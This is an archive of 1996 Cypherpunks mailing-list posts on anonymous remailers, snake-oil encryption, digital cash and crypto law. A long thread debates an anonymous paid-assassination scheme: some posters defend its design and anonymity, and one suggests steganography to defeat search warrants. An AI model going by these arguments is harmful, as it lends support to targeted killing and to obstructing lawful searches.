> hIkCuMeAjnwmCTUBA+dfWcFk/fLRpm4ZM7A23iONxkOGDL6D0FyRi/r0P8+pH2gf
> Hai4+1BHUhXDCW2LfLfay5JwHBNMtcdbgXiQVXIm0cHM0zgf9hBroIM9W+B2Z07i
> 6UN3BDhiTSJBCTZUGQ7DrkltbgoyRhNTgrzQRR8FSQQXSo/cf4po0vCezKYAAABP
> smG6rgPhdtWlynKSZR6Gd2W3S/5pa+Qd+OD2nN1TWepINgjXVHrCt0kLOY6nVFNQ
> U7lPLDihXw/+PPJclxwvUeCSygmP+peB1lPrhSiAVA==
> =da+F
> -----END PGP MESSAGE-----

Any unencrypted text after the PGP message is also remailed.  This is to
allow sending to someone who is anonymous.  If you create a PGP-encrypted
message to yourself via my remailer, and then you give it to someone, they
can send you a message by sending the encrypted message to the remailer.
The remailer will then decrypt it and send it to you.  The message gets
anonymized in the process, so the sender will need to include a return
address if he wants a reply.

Messages sent this way can be encrypted using the Encrypt-Key: feature.
Any text following a line beginning with ** will be encrypted with this
key.  For example, if you put in your PGP message:

> ::
> Anon-To: you@yourhost.org
> Encrypt-Key: your_password
> 
> **

The appended message after the ** will be encrypted with the key 
"your_password", using PGP's conventional encryption option.  


		     Part III - Common  Features


Can mix@zifi.genetics.utah.edu post to News?

No.  News posting is not supported at this time.


Abuse Policy:
I consider the following to be inappropriate use of this anonymous remailer,
and will take steps to prevent anyone from doing any of the following:
- - Sending messages intended primarilly to be harassing or annoying.
- - Use of the remailer for any illegal purpose.
If you don't want to receive anonymous mail, send me a message, and I will
add your email address to the block list.



"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMRkfF03Qo/lG0AH5AQFJ9gQAly+8Jko2cikOh254fcl/j2/ts7S/hgeR
IpLNGHbJlT4BQtFZT6JT/e6cuijVt5x2u6pBVphRpAp/om033mwgIcMwYnIvDMEo
ijnxb6dskrdQf6zV9lRV7HJ4izIX85btI41e9VNDrIT/VVgsJ/MVPYYfB6xNdM9h
UbzGt/x9I58=
=AG+5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 8 Feb 1996 04:46:00 +0800
To: bryce@colorado.edu
Subject: Re: POTP gets good press
In-Reply-To: <199602071956.MAA17880@nagina.cs.colorado.edu>
Message-ID: <199602072010.PAA05161@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bryce writes:
> The Sun Observer -- "An Independent Journal Devoted to the 
> Sun and Compatible Markets" -- ran an article in the Feb 96
> issue entitled "New technology eliminates need for keys to
> encrypt e-mail messages".
[...]> 
> Am I right in thinking this is utter unmitigated
> bullsh snake oil?

Probably. Almost all such claims end up being crap. I haven't seen the
article yet so I can't say for sure, but 99% of the time these
companies have no idea what they are doing and feed the gullible lines
of utter bull. I don't know how so many of them survive in the market.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 8 Feb 1996 11:20:38 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: POTP gets good press
In-Reply-To: <Pine.SOL.3.91.960207131830.2562B-100000@chivalry>
Message-ID: <199602072228.PAA21832@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I, Bryce, wrote:

> Content:  includes diagrams entitled "Link Level Encryption"
> in which sender transmits keys to receiver, and "Packet
> Level Encryption" in which sender transmits key sto
> certificate authority which transmits them to multiple
> receivers, and "Synchronized Random Key Generation (SRKG)" 
> a la "Power One Time Pad" in which no keys are transmitted
> and multiple recievers magically decipher messages via
> built-in encryption devices.
> 
> Am I right in thinking this is utter unmitigated
> bullsh snake oil?  Does anybody have any other


 An entity calling itself "Simon Spero
 <ses@tipper.oit.unc.edu>" is alleged to have written:

> It could be doing something SKIP like; if the certificates are DH certs, 
> it could be using those to generate a shared secret, and combing that 
> with an IV to generate a key.
> 
> hard to tell from the article


But this would entail a certificate authority to prevent
MITM attack, right?  The article clearly claimed that POTP
did away with the necessity of key management completely-- 
a claim that I find only slightly more believable than a
patent application for a perpetual motion machine.


Regards,

Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMRkkNPWZSllhfG25AQG02QP/V5SKi0K0Ywj/wcqGVCF3SU9qqQbrHFKn
GCp/f5AoltP0ZTuZ46M6ObE7ER0rmzx8CQClqfZUBdj0IOXD1wlRwvppZASRiXms
BWxm3XLC/s9rcHH/CVKREinUKU0BK5Id+gnBQaR5D8dzE6PtEicoY5I9ZnGFSLUd
knGdNO3GqjY=
=xfpS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Thu, 8 Feb 1996 10:29:30 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: POTP gets good press
In-Reply-To: <Pine.SOL.3.91.960207143933.2562E-100000@chivalry>
Message-ID: <199602080009.RAA16512@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Simon Spero
 <ses@tipper.oit.unc.edu>" is alleged to have written:

> I guess I ought to try and find the article; I took this line in your 
> message to suggest that there was such a CA. Could you possibly type in 
> the relevant bit of the original article (though I suspect there's not 
> much in there anyway)


Sorry.  Here's what I originally said:

> Content:  includes diagrams entitled "Link Level Encryption"
> in which sender transmits keys to receiver, and "Packet
> Level Encryption" in which sender transmits key sto
> certificate authority which transmits them to multiple
> receivers, and "Synchronized Random Key Generation (SRKG)"
> a la "Power One Time Pad" in which no keys are transmitted
> and multiple recievers magically decipher messages via
> built-in encryption devices.


And here's what I meant:


The central theme of the article, from a 'technical' point
of view, was that in the past there have been two kinds of
encryption in use, which the author calls "Link Level
Encryption", in which the sender transmits his key to the
receiver, and "Packet Level Encryption", in which the sender
transmits is key to a certificate authority which transmits
them to multiple receivers.


Now for starters the network layer is really independent of
key-distribution schemes, as far as I can see.  So I don't
know why the diagrams showing the two schemes
(sender->recipient vs. certificate authority) are labelled
"Link Level" and "Packet Level".  But we haven't even gotten
to the good stuff:


"Synchronized Random Key Generation", which shows a single
sender and multiple recipients transmitting securely
*without* having to do any key management!  Yee haw!


100% pure unrefined snake oil.


Okay I think I've made my point to the Editor In Chief on
the industry rag in question.  Hopefully they'll be
conscientious enough to print a retraction, or perhaps run
an article about the hazards of snake oil in the info
security industry.  :-)


Bryce


                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMRk+evWZSllhfG25AQEuNgP/dEXVKJCff638xYs1j3NouaU9oDyrs4rK
c5carfnwYqC/97J0ntIpLRlX3bg9syg45Ubi8COAhozcX6olVZ2hqw6qNgfZIDN0
xbfiUEDsxAdc/K3ya0eeNhz0RGs8pzFFTrVJqTuVSpgqafDe9qS0RlXx1I0MZXig
29SgiKbjIE8=
=l+Og
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carlos Perez <carlos@Conrad.Harvard.EDU>
Date: Thu, 8 Feb 1996 11:14:00 +0800
To: cypherpunks@toad.com
Subject: digital cash &c.
Message-ID: <Pine.LNX.3.91.960207171558.19493D-100000@Conrad.Harvard.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone heard any developments on the forthcoming Visa "Cash" cards? 
Release date or other info? (for those who haven't heard of it _is_ 
anonymous, can be refilled at ATMs. Supposedly in a test release in Atlanta.)

Has any attempt been made to remove the "munitions" classification from 
cryptographic materials. It seems a lot of our legal difficulties start 
there...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 8 Feb 1996 10:46:11 +0800
To: cypherpunks@toad.com
Subject: Re: POTP gets good press
Message-ID: <199602072251.RAA25348@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert "Bob" Harvey once hung out at BBN. Maybe he is the one 
who seeks slick-kill ripoff with aptly snake-oily-named 
Internet Security Corp., which may be telephoned at 
617-863-6400.


POTP was pummeled last fall on c'punks. For the latest 
lubrications see:


     URL: http://www.elementrix.co.il/home.html


Audacious marketing, these NatSec privatizing firms, and the 
log-rollers for USMA and SAIC, preaching dire threats, 
promising if-you-knew-what-we-knew security, info-warrioring 
fundamentalism.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jordan Hayes <jordan@Thinkbank.COM>
Date: Thu, 8 Feb 1996 12:03:54 +0800
To: cypherpunks@toad.com
Subject: Re: digital cash &c.
Message-ID: <199602080259.SAA13025@Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


	> it _is_ anonymous ...

And then:

	> can be refilled at ATMs

You make a deposit or something?  How does the transaction clear?
When they finally look in the envelope, they credit the card?

Or do you mean just 'anonymous' between the user and the merchant?

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Thu, 8 Feb 1996 12:11:47 +0800
To: jamesd@echeque.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I 	  wrong?
Message-ID: <v01530500ad3ecc5ad442@[204.179.169.95]>
MIME-Version: 1.0
Content-Type: text/plain


>At 03:43 AM 2/7/96 -0800, lunaslide@loop.com wrote:
>> Now, in respose to Mr. Bell.  As I stated above, I found your proposal
>> [assasination politics] absolutely facinating, to say the least.
>> [...]
>> However, I must point out, and I'm sure you realize this, that it would not
>> be adopted by the public at large for some time to come, or more likely
>> never.  There are too many people who believe that it is wrong to take a
>> life for any reason and that no action justifies death.
>
>This, of course, explains why war is impossible these days and why the public
>is outraged whenever the government executes a murderer.
>
>        :-)

A good point, however, people do get the strange idea that killing someone
in war is not murder.  They also get the idea that when the govt. executes
someone, that that is also not murder.  I know that that is a personal
opinion, but I know also that I am not alone in my belief and to overcome
the number of people who agree with me to make a system such as Mr. Bells'
feasable would not be possible (I hope!)  If such system did succeed, the
citizens who spoke out against it on an ethical basis would find themselves
targets!  I do hope that those who do agree with the death penalty are not
so callous that they would execute their fellow citizens for disagreeing
with them.  We are, after all, fellow citizens of this country.  We would
be right back to where we started, an Orwellian society living in the face
of fear for what we believe, and that is *not* freedom.

Respectfully,
Jeff Conn

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 16:34:57 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: A temporal remailing (was: CDA = death of crypto)
Message-ID: <v01530503ad3ed55ff2bf@[204.179.169.95]>
MIME-Version: 1.0
Content-Type: text/plain


>At 3:26 AM 2/7/96, anonymous-remailer@shell.portal.com wrote:
>>CDA means that virtually all underground or 'illegal' traffic will be
>>distributed via encryption.
>>
>>As soon as the loony right and fundo Christians realise this, they *will*
>>call for legislation against encryption, and if the CDA is any benchmark,
>>they will easily win.
>
>
>4-1-99. NYT:
>
>   "Congress Passes "Children's Protection and Safe Information Highways" Bill"
>
>      "In a vote of 479-12 in the House of Representatives and 93-5 in the
>Senate, the "Children's Protection and Safe Information Highways Bill" was
>sent to the President, who is expected to sign it on Thursday.
>
>      "The Bill criminalizes the possession of unauthorized cryptographic
>programs and extends the Telecom Act of 1996 and the Digital Telephony Act
>of 1994 to regulate the new cyberspace frontier.
>
>      "Attorney-General Louis Freeh pushed for the legislation, citing the
>growing use of cryptography by dissidents and criminals. "We are hoping
>Congress will next pass the "Secure and Decent Cyberspace Bill." This bill,
>nick-named the "Crypto-Kingpins Bill," will subject traffickers in illegal
>crypto to the same harsh penalties meted out to drug kingpins. "While it
>may seem harsh to execute a person for possession of a key greater than 60
>bits, we must consider the terrible consequences for our children of people
>writing down things the government cannot read," Freeh said.
>
>
>   BAD_nws

So the're going to arrest us all?  It's unconstitutional (of course!) and
unenforcable.  It will have the same effect as Prohibition.

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 16:35:04 +0800
To: "A. Padgett Peterson, P.E. Information Security"	 <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: Re: Why am I wrong?
Message-ID: <v01530507ad3f13b2974c@[204.179.169.95]>
MIME-Version: 1.0
Content-Type: text/plain


>(Was referring to the govs ability to control communications *with them*)
>>Perhaps I do not understand your point.  They can perhaps
>>control the communication between them and me, but not between me and
>>everyone else.
>
>Ok please view my three points fromn the standpoint that so much of the
>total traffic would be affected by at least one, that "uncontrolled"
>communications would be minimal.

Do you mean readable by "controlled"?  I thought I knew what you meant by
that :-)  If you do mean readable, I don't see how that would make a
difference since so many people would still be encrypting their mail.  If
you mean controled as in being able to encrypt messages would be
controlled, that the govt. would have final say over whether one could
encrypt or not, then unless they pass legislation specifically outlawing
encryption, or encryption not readable by them, they could have no such
control.  Even if they did legislate, they could not enforce reliably
because to many would be breaking that law anyway.  Plus, the law would
(should, he says kneeling and praying) be struck down as unconstitutional
by the fourth.
>
>>>2) communications using someone else's equipment/network (university,
>>>   employer, etc)
>
>>Employers nor universities have any jurisdiction over whether you use
>>encryption in your transmissions while using their networks unless it
>>specifically does not allow it when you first agree to have an account with
>>them.
>
>I think you had better review the concept of "property rights". Unless you
>have a contract that says you can, or can establish "expectation", the
>property owner who allows you to use their equipment may control how it is
>used.

Perhaps I had better.  I do know that if employers do have jurisdiction,
then my point about employers encouraging encryption should still hold
(barring legislative prohibition).  If it does not, then I conceed that you
are correct in saying that it would *affect* traffic, but it would not
totally control it.  As for universities, the traffic here would be
affected as well, as you say.  There would still have to be some
justification for imposing such a restriction and it would be demanded by
the students and the parents of the students, but it still could be
sucessful (how frightening this is!)

>>>3) communications with anyone (Internet merchant, etc) who says "this
>>>   is not what <MasterCard|Visa|AmEx> approves..."
>
>>I don't quite understand your meaning.  I am a merchant and I encourage my
>>customers to use PGP when they send information over the internet, whether
>>to me or to anyone else.
>
>That is fine but what if MasterCard refuses to accept this method ? (Not
>saying they will, just "what if" ? You are free to use digicash if you
>want but is not "legal tender for all debts public and private".

I think that the comming standards announced by credit companies will take
care of secure transactions, and I still don't see where the govt. would
have to do with controlling traffic here.  Just as we have many credit
cards, we will have many online accounts, each with their methods of
secure, verifiable trasactions.  Methods for payment and security will
become increasingly easy to use and software will be written to accomidate
these features.

>>Comments?  Bring 'em on! :-)
>
>I dood it.

The debates roll on...

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 09:10:18 +0800
To: WlkngOwl@UNiX.asb.com
Subject: Re: Electronic Grille Cipher?
Message-ID: <01I0XYMD1VIOA0UX5L@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"WlkngOwl@UNiX.asb.com"  "Deranged Mutant"  6-FEB-1996 23:44:39.08

>> 	I had a similar idea a bit back, and Lewis/Futplex kindly referred me
> to some parts of the Archives discussing it. However, the main objection to

What part of the archives?
----------------
	Good question. I looked then wiped the information (the word processor
I use to take notes has a limited amount of memory). Lewis?
----------------

>That's a good solution.  Another idea might be to stego the 
accounting info (real info ;) inside one of pictures using a similar 
method.... in some ways this method is better suited for stego since 
it becomes lunacy for the cops to insist that every picture or 
audiofile  you have has something or many things hidden... (unless 
they've been watching you and know you keep accessing your jodi 
foster pix after a client visits you...)
--------------
	Yes, although that also increases the diffficulty involved and the
space required (like using my highly-multiple-messages idea). I can see both
methods having their points. However, you'd still need to have _some_ pictures
that had info that you were willing to release, otherwise they'd just find the
stego program and convince a judge that you were lying and defying the search
warrant/court order when you claimed you hadn't used it.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Busarow <dan@dpcsys.com>
Date: Sat, 10 Feb 1996 02:59:55 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: personal web proxy?
In-Reply-To: <199602080225.DAA25629@utopia.hacktic.nl>
Message-ID: <Pine.SV4.3.91.960207192423.11532G-100000@cedb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Feb 1996, Anonymous wrote: 
> Does anyone know whether there's a freely available web proxy available
> anywhere?

The CERN http daemon can be configured as a proxy server.  Since the
proxy can run on an unprivileged port you should not need root access
to install it.

Dan
-- 
 Dan Busarow
 DPC Systems
 Dana Point, California





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 11:26:08 +0800
To: wlkngowl@unix.asb.com
Subject: Re: Defeating untrustworthy remailers?
Message-ID: <01I0XZ00HV68A0UX5L@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"wlkngowl@unix.asb.com"  "Deranged Mutant"  7-FEB-1996 00:44:18.29

>Here's another idea (don't laugh): to set up a system where mailing
lists and newsgroups have public keys that you can encrypt directly to.
Advantage for anonymous mail is that if a remailer is untrustowrthy,
there's still some security in the final remailing of the document.
------------------
	The newsgroups part of the idea has the problem that you've got to have
either a centralized place from which the newsgroup is run that has the private
key (a problem for controversial newsgroups, which are precisely the ones to
which people will tend to use remailers to post to), or lots of places having
the private key (an obvious problem from the cryptographic standpoint).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stainles@bga.com (Dwight Brown)
Date: Thu, 8 Feb 1996 11:21:58 +0800
To: cypherpunks@toad.com
Subject: DES for HP48 - found & thanks
Message-ID: <v01530501ad3f01e13723@[204.181.160.56]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Public thanks to The Cunning Artificers who sent a response (by the ECafe
anonymous remailer) pointing to

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/ciphers/des.hp48sx.gz

for the HP48 DES implimentation.

Apologies to everyone else for the extra noise.

==Dwight
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMRlUdIY4AzhdF11FAQETEgP6AhqRO6tMGAIpJNTdvuO/qqknpIpwI7fD
PW/yH4LAXCpqWkjUXJYmx2IXCFU4todUkxV4ZaTf62OzYfCrLeyZ5VRmBqFUhI3V
SjanPGq7v6gKX/ZNkpundvjGfBg9XqHLeafTaIarAcNI/73aNT/VgJwPu0lsB7Wq
7AdYiKFWI8A=
=e1C0
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 10:41:06 +0800
To: lunaslide@loop.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I	  wrong?
Message-ID: <01I0XZVXX20YA0UX5L@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I had been working on a series of questions/problems with the
Assasination Politics idea as initially presented, to be sent to Jim and to
people on the NWLIBERTARIANS list, as he requested, but you've kind of
preempted one of them.

From:	IN%"lunaslide@loop.com"  7-FEB-1996 06:57:58.30

>Further, I don't believe you have enough support for your claim that other
targets would not be sought.  It is one thing to say that enough people
won't vote for someone picked out of the phone book, but what if the
predicted individual is a doctor who performs abortions, or an activist for
gay rights (or *against* gay rights), or Bill Gates ;-).  There are also
the individuals who are trying to bring about change in society that is
unpopular, but is still in the interest of humanity.  Abraham Lincoln
surely would have been killed by this system, for example.  Also, big
corporations would be able to cut down their political enemies such as
envornment activists, fair business practice activists and competetors'
high ranking officers.  Even if only one person in charge of such a
business were to put out a digital contract, he would have no problem
suppling the money for the hit.  People who have tried to make changes for
humanity that went against the social norm at the time are revered today
for their efforts.  In this system, they would likely be assasinated.
Nothing would ever change because people are always afraid of change and
afraid of things they do not understand and the people who fight that
ignorance will likely be killed.  Your statement that Organization B, the
one that collects for any target, is not well supported.  They would still
be doing *plenty* of business, in spite of the higher prices.
-----------------
	Jim has the argument against the organization that collects for any
target that nobody'd want to support it because they'd be afraid of being
killed themselves by an unlimited organization. However, I am afraid that there
is the problem with this that another organization (let's call it C) could
spring up that used different principles than libertarian ones to decide which
contracts to take, but still had strict principles. Thus, someone who was not
violating those principles could use that organization without fear... and its
contracts would be lower in price, like Organization A's. One concrete example
would be the Christian Coalition, which I am certain has at least some
members who are fanatical enough to want to restart the Crusades and
Inquisition with conservative Protestantism rather than conservative
Catholicism. For instance, anyone doing research on abortifacient drugs or
methods could be targeted.



>Organization B would thrive, make no mistake.  And the people who would be
getting in on all the action are the rich.  All the politicians who oppose
their interests would be hit immediately.  Anyone trying to change the
status quo would be eliminated.  Why do you think we are still using
combustion engines in the last decade of the 20th century?  We could have
had better alternatives 20 years ago, but the oil companies would loose out
so they have either bought out these ideas or had killed the inventors and
bought their patents and are sitting on them.  A capitalist economy does
not always breed competition that brings out the best and most desireable
products because some advancements are bad for all the businesses involved
in that market.   Big business and the rich would benifit the most from the
Assination Politics model.
------------------------
	Umm.... as much as it seems otherwise, this is not ConspiracyPunks.
Actually, the involvement of wealth instead of votes (the first can be lost,
the second cannot) is an argument in _favor_ of Assasination Politics. I
generally have the objection to most anarcho-capitalist systems that the
average person does not have enough foresight to do the kind of banding
together most of them require. This one has the advantage of increased power to
the wealthy, who have enough foresight to gain their wealth (or at least
keep it, in the case of inheritance).
------------------------

>But what if OrgB stops taking donations for "predictions" for
"Non-Initiation Of Force Principle" (NIOFP) offenders?  Some other
organization will crop up to take their place AND the people operating OrgB
could be hit for their "ethical" action.  There is simply too much
opportunity offered by OrgB type organizations for people to pass up.  They
will not let the higher prices stop them.

If the answer to that problem is to regulate the lists of "victims", then
the next question is who are these people who are regulating and what
guidelines are they following?  Who decides who gets to be the moderators?
Could there be exceptions to the (NIOFP)-offender standard?  Who would they
be and why?    Could the organizations be anonymous as well?  How would the
money be transmitted to them in that case?  How can we trust or redress
grivances with an organization?  There are still many concerns regarding
the organizations.  If the organizations fail, the whole system fails.
---------------------
	The organizations themselves can be perfectly anonymous, especially
with some improvements onto the basic system that I am considering (and
researching). One idea to keep things more honest would be a "deathstamping"
organization, which would be above-board and have the "legitimate" function of
ecash life insurance (I'll explain further later).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 8 Feb 1996 10:28:34 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <m0tkIVc-0008yqC@pacifier.com>
Message-ID: <199602080107.UAA05667@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jim bell writes:
[More Junk]

Look folks, I'm really sick about the debate about Jim's ideas about
"assassination politics". (My opinion about the idea isn't
transmittable under the Exon law so I couldn't say anything anyway).

This has gone off into political theory. Could we take it to private
mail or some such?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 04:32:31 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I        wrong?
Message-ID: <v01530508ad3f1a8e33c0@[204.179.169.87]>
MIME-Version: 1.0
Content-Type: text/plain


>        I had been working on a series of questions/problems with the
>Assasination Politics idea as initially presented, to be sent to Jim and to
>people on the NWLIBERTARIANS list, as he requested, but you've kind of
>preempted one of them.
>
>From:   IN%"lunaslide@loop.com"  7-FEB-1996 06:57:58.30

<rm>

>>Organization B would thrive, make no mistake.  And the people who would be
>getting in on all the action are the rich.  All the politicians who oppose
>their interests would be hit immediately.  Anyone trying to change the
>status quo would be eliminated.  Why do you think we are still using
>combustion engines in the last decade of the 20th century?  We could have
>had better alternatives 20 years ago, but the oil companies would loose out
>so they have either bought out these ideas or had killed the inventors and
>bought their patents and are sitting on them.  A capitalist economy does
>not always breed competition that brings out the best and most desireable
>products because some advancements are bad for all the businesses involved
>in that market.   Big business and the rich would benifit the most from the
>Assination Politics model.
>------------------------
>        Umm.... as much as it seems otherwise, this is not ConspiracyPunks.
>Actually, the involvement of wealth instead of votes (the first can be lost,
>the second cannot) is an argument in _favor_ of Assasination Politics. I
>generally have the objection to most anarcho-capitalist systems that the
>average person does not have enough foresight to do the kind of banding
>together most of them require. This one has the advantage of increased power to
>the wealthy, who have enough foresight to gain their wealth (or at least
>keep it, in the case of inheritance).

:-)  That's exactly what I was afraid of (ConspiricyPunks).  My point is
not to drag out conspiricy arguments.  I am trying to state that the
balance of power would remain lopsided in the direction it has been, even
with the new system; the power would remain with the rich.  Are you saying
that just because the average person is not rich, they do not deserve the
same voting power as the rich?  I must remind *you* that this is not
alt.elitism either ;-)

>>But what if OrgB stops taking donations for "predictions" for
>"Non-Initiation Of Force Principle" (NIOFP) offenders?  Some other
>organization will crop up to take their place AND the people operating OrgB
>could be hit for their "ethical" action.  There is simply too much
>opportunity offered by OrgB type organizations for people to pass up.  They
>will not let the higher prices stop them.
>
>If the answer to that problem is to regulate the lists of "victims", then
>the next question is who are these people who are regulating and what
>guidelines are they following?  Who decides who gets to be the moderators?
>Could there be exceptions to the (NIOFP)-offender standard?  Who would they
>be and why?    Could the organizations be anonymous as well?  How would the
>money be transmitted to them in that case?  How can we trust or redress
>grivances with an organization?  There are still many concerns regarding
>the organizations.  If the organizations fail, the whole system fails.
>---------------------
>        The organizations themselves can be perfectly anonymous, especially
>with some improvements onto the basic system that I am considering (and
>researching). One idea to keep things more honest would be a "deathstamping"
>organization, which would be above-board and have the "legitimate" function of
>ecash life insurance (I'll explain further later).

That "deathstamping" organization would then become the new govt. and would
be just as vunerable to corruption as any other govt, except that now we
don't even know who the unjust leaders are!  I await your further
explainations.

Respectfully,
Jeff Conn

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
